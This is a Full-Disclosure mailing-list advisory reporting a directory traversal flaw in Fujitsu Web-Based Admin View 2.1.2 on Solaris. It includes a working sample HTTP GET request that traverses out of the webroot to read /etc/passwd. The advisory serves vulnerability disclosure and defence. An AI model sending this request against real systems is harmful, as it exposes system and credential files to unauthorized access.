Fujitsu Web-Based Admin View Directory Traversal Vulnerability

["Deniz Cevik" <Deniz.Cevik () intellect com tr>]

Fujitsu Web-Based Admin View Directory Traversal Vulnerability

 

Version: 2.1.2 on Solaris, Other versions may vulnerable

 

Vulnerability: Directory Traversal

 

Risk: Critical

 

Description:  Due to insufficient control of user inputs, Fujitsu
Web-based admin view reveals content of files residing in folders other
than webroot. This will allow an attacker to view arbitrary local files
within the context of the web server. 

 

Sample Request:

 

GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0

Host: target:8081

 

Deniz CEVIK

www.intellectpro.com.tr

 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/